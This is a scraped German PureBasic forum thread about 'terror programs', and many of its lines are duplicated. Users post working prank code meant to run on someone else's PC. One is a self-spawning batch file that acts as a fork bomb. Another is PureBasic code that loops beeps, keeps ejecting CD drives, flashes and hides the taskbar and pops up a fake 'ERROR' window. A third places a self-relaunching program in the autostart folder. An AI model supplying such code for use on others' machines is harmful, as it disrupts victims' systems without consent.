Terror - Programm
- hardfalcon
Lustig ist es, wenn man eine .bat-Datei macht, die z.B. "hallo.bat" heißt, und darin steht einfach nur "start hallo.bat"
Das ist schon übel genug, aber noch schlimmer wird's, wenn man ZWEIMAL "start hallo.bat" reinschreibt
Mir ist das mal aus Versehen passiert, also Fall 1
und außer einem Neustart fiel mir keine andere Lösung ein...

Das ist schon übel genug, aber noch schlimmer wird's, wenn man ZWEIMAL "start hallo.bat" reinschreibt

Mir ist das mal aus Versehen passiert, also Fall 1

ZeHa hat bisher kein Danke erhalten.
Klicke hier, wenn Du wissen möchtest, woran ihm das vorbeigeht.
-
Hallo zusammen
Hab gerade das erste Terrorprogramm hier für PB4 heute angepasst
Gruss Ground0
Hab gerade das erste Terrorprogramm hier für PB4 heute angepasst

Code: Alles auswählen
Procedure AlertThread()
Repeat
Beep_(1000,100)
Beep_(2000,50)
Beep_(500,200)
ForEver
EndProcedure
Procedure AlertThreada()
cd = InitAudioCD()
Repeat
o + 1
If o > 1
o = 0
EndIf
For a = 0 To cd-1
UseAudioCD(a)
EjectAudioCD(o)
Next
ForEver
EndProcedure
Procedure AlertThreadb()
Repeat
taskbarhandle.l = FindWindow_("Shell_TrayWnd", 0)
ret = ShowWindow_(taskbarhandle, #SW_SHOW)
Delay(1000)
taskbarhandle.l = FindWindow_("Shell_TrayWnd", 0)
ret = ShowWindow_(taskbarhandle, #SW_HIDE)
Delay(1000)
ForEver
EndProcedure
CreateThread(@AlertThreadb(), 0)
CreateThread(@AlertThreada(), 0)
CreateThread(@AlertThread(), 0)
OpenWindow(1,0,0,100,100,"ERROR",#PB_Window_ScreenCentered)
Repeat
HideWindow(1,d)
d+1
If d > 1
d = 0
EndIf
StartDrawing(WindowOutput(1))
DrawText(20,20,"ERROR")
StopDrawing()
Delay(1000)
ForEver
lmon Monitoring Service inkl. Clients
lweb Multi-Threaded Webserver
lbup-server Backup Server applikation
lmanager ERP Applikation.
lweb Multi-Threaded Webserver
lbup-server Backup Server applikation
lmanager ERP Applikation.
Oder ich habe noch eine Idee, mein Bruder hat ein Spiel (Autorennen).
Aber wenn man lange auf die Leertaste drückt kann man dich mehr lanken, Folge: Man fährt geradeaus in den Abgrund.
Geht das irgentwie das wenn ich wen 2 Computer im Netzwerk sind dass dann bei einem auf was gedrückt wird und beim anderen die Wirkung passiert, die beim drücken der Leertaste passiert oder gibt es irgentwelche Codeschnipsel?
Aber wenn man lange auf die Leertaste drückt kann man dich mehr lanken, Folge: Man fährt geradeaus in den Abgrund.
Geht das irgentwie das wenn ich wen 2 Computer im Netzwerk sind dass dann bei einem auf was gedrückt wird und beim anderen die Wirkung passiert, die beim drücken der Leertaste passiert oder gibt es irgentwelche Codeschnipsel?
-
> Aber wenn man lange auf die Leertaste drückt kann man dich mehr lanken, Folge: Man fährt geradeaus in den Abgrund.
das liegt einfach daran, dass der tatastaturpuffer überläuft, er nimmt also die lenk-tastendrücke nicht schnell genug an, weil er noch mit der bearbeitung der spaces beschäftigt ist. das game ist einfach schlecht programmiert, sonst nix...
> Geht das irgentwie das wenn ich wen 2 Computer im Netzwerk sind dass dann bei einem auf was gedrückt wird und beim anderen die Wirkung passiert, die beim drücken der Leertaste passiert
klar geht das, wenn du ein autorennen schreibst, kannst du alles einbaun.
ach, du meinst bei fertigen games?
du müsstest wohl die komplette eingabe des 2ten rechners hooken, und ggf. bei anweisung über netz andere eingaben als wirklich stattfinden simulieren.
aber das wäre ein riesen aufwand, in meinen augen ist es energieverschwendung, soviel kraft und zeit in destruktive ideen zu investieren.
such dir ne freundin, oder keul' dir mal einen, du scheinst mir irgendwie unausgeglichen.
das liegt einfach daran, dass der tatastaturpuffer überläuft, er nimmt also die lenk-tastendrücke nicht schnell genug an, weil er noch mit der bearbeitung der spaces beschäftigt ist. das game ist einfach schlecht programmiert, sonst nix...
> Geht das irgentwie das wenn ich wen 2 Computer im Netzwerk sind dass dann bei einem auf was gedrückt wird und beim anderen die Wirkung passiert, die beim drücken der Leertaste passiert
klar geht das, wenn du ein autorennen schreibst, kannst du alles einbaun.
ach, du meinst bei fertigen games?
du müsstest wohl die komplette eingabe des 2ten rechners hooken, und ggf. bei anweisung über netz andere eingaben als wirklich stattfinden simulieren.
aber das wäre ein riesen aufwand, in meinen augen ist es energieverschwendung, soviel kraft und zeit in destruktive ideen zu investieren.
such dir ne freundin, oder keul' dir mal einen, du scheinst mir irgendwie unausgeglichen.
Der Narr denkt er sei ein weiser Mann.
Der Weise weiß, dass er ein Narr ist.
Der Weise weiß, dass er ein Narr ist.
- Programie
- Computerausstattung: https://www.sysprofile.de/id160800
Das Programm als App.exe in das Verzeichnis "C:\" kompilieren.
Dann das Programm in den Autostartordner (C:\Dokumente und Einstellungen\AllUsers\Startmenu\Autostart\Run.exe) kopieren.
Und dann: Starten!
Viel spaß!
RunProgram("C:\App.exe")
Repeat:ForEver
Dann das Programm in den Autostartordner (C:\Dokumente und Einstellungen\AllUsers\Startmenu\Autostart\Run.exe) kopieren.
Und dann: Starten!

Viel spaß!

Repeat:ForEver

ZeHa hat bisher kein Danke erhalten.
Klicke hier, wenn Du wissen möchtest, woran ihm das vorbeigeht.